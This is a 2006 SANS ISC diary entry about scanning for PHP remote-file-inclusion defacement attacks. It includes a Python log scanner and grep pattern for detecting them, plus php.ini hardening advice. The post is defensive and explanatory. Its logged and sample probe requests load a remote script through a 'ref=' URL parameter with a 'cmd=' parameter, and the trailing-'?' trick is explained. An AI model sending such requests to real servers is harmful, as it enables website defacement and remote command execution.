SANS ISC: InfoSec Handlers Diary Blog
Probable php shell/web defacement tool usage on the rise

Published: 2006-01-09
Last Updated: 2006-01-09 23:00:39 UTC
by William Salusky (Version: 2)
The ISC handler mailbox has received multiple reports of web site defacement attempts that apparently use the "Defacing Tool 2.0 by r3v3ng4ns" suite, a set of PHP scripts built to deface websites by way of PHP remote file inclusion.  Several reports arriving within a short window suggest aggressive scanning with this tool suite.  Search engine hits for this attacker/tool combination go back to early December 2005, so the tool has been in circulation for at least a month.  The site initially reported as hosting the PHP scripts has already removed them, but script hosting will always be a moving target.

If you run PHP-enabled web servers, look through your recent HTTP logs for requests similar to the one below.  The common thread is a 'ref=' parameter carrying a URL and a 'cmd=' parameter in the same request.  The trailing '?' on the included URL is a standard remote-inclusion trick: anything the vulnerable script appends to the include path (a file extension, for instance) ends up as a harmless query string on the attacker's URL instead of breaking the include.  A Snort signature to catch this scanning should be trivial to write, since the bleedingsnort rules do not yet alert on this case; we will probably post a usable signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=
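The log check described above, as an added example that is not part of the original diary: a small Python scanner that parses Apache combined-format access-log lines, decodes the query string, and flags requests where an include parameter ('ref=' here) carries a URL and a 'cmd=' parameter is present. The sample log lines, the client addresses and the www.example.net / www.example.org hosts are constructed for illustration and are not real tool-hosting sites.

```python
"""Scan Apache combined-format access-log lines for the remote-file-inclusion
probe pattern discussed above: a 'ref=' parameter whose value is a URL and a
'cmd=' parameter in the same request.

This is an added example, not code from the ISC diary.  The log lines in
SAMPLE_LOG are constructed for illustration; www.example.net and
www.example.org are placeholders, not real tool-hosting sites.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log: client ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names that carry the include target.  'ref' is the one seen in the
# diary's log line; add others if your application exposes different names.
INCLUDE_PARAMS = ("ref",)
URL_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def is_rfi_probe(target):
    """Return the remote include URL if the request target matches the
    pattern (URL in an include parameter plus a cmd= parameter), else None.
    """
    query = urlsplit(target).query
    # keep_blank_values: the probe in the diary sends an *empty* cmd=,
    # which parse_qs would otherwise silently drop.
    params = parse_qs(query, keep_blank_values=True)
    if "cmd" not in params:
        return None
    for name in INCLUDE_PARAMS:
        for value in params.get(name, []):
            if URL_SCHEME_RE.match(value):
                return value
    return None


def scan_log(text):
    """Return one dict per matching request: client, time, requested path,
    the remote include URL and the cmd= value."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        include_url = is_rfi_probe(m.group("target"))
        if include_url is None:
            continue
        parts = urlsplit(m.group("target"))
        params = parse_qs(parts.query, keep_blank_values=True)
        hits.append({
            "client": m.group("client"),
            "time": m.group("time"),
            "path": parts.path,
            "include_url": include_url,
            "cmd": params["cmd"][0],
        })
    return hits


def hosting_hosts(hits):
    """Hosts serving the included scripts, i.e. the providers to notify."""
    return {urlsplit(h["include_url"]).netloc for h in hits}


# Constructed sample log, modelled on the diary's request line.  Lines 3 and 4
# are benign lookalikes: a non-URL ref=, and a URL ref= without cmd=.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jan/2006:14:03:11 +0000] "GET /?ref=http://www.example.net/tools/shell.dot?&cmd= HTTP/1.1" 200 1834 "-" "Mozilla/4.0"
10.0.0.5 - - [09/Jan/2006:14:03:12 +0000] "GET /modules.php?name=News&ref=http%3A%2F%2Fwww.example.net%2Ftools%2Fshell.dot%3F&cmd=id HTTP/1.1" 404 512 "-" "Mozilla/4.0"
192.0.2.7 - - [09/Jan/2006:14:05:40 +0000] "GET /index.php?ref=about&cmd=view HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
192.0.2.9 - - [09/Jan/2006:14:06:02 +0000] "GET /?ref=http://www.example.org/page.html HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(f'{hit["client"]} {hit["path"]} include={hit["include_url"]} cmd={hit["cmd"]!r}')
    print("notify:", ", ".join(sorted(hosting_hosts(hits))))
```

A quick `grep -E 'ref=https?://[^ ]*cmd=' access.log` catches the exact form shown in the diary, but misses requests where the parameters are reordered or the URL is percent-encoded (as in the second sample line); decoding the query string before matching, as the script does, avoids both gaps. Parameter names other than 'ref' are common in other inclusion kits, so extend INCLUDE_PARAMS to whatever your applications expose.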

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.

If you manage a web host that you are certain does not need remote includes, disable them in your php.ini configuration file by setting the following directive.  Note that this also turns off URL access for fopen(), file_get_contents() and similar functions, so test applications that fetch remote content; in PHP 5.2 and later, remote includes are governed separately by allow_url_include (Off by default), so check both directives.  Disabling remote URLs closes this scanning vector but does not fix the underlying bug: a script that passes unvalidated user input to include() still needs to be corrected.

allow_url_fopen = Off

We have received additional reports of attempted defacement using the same tool suite, this time targeting PHP-Nuke installations specifically.  As with any complex PHP application, keep it patched.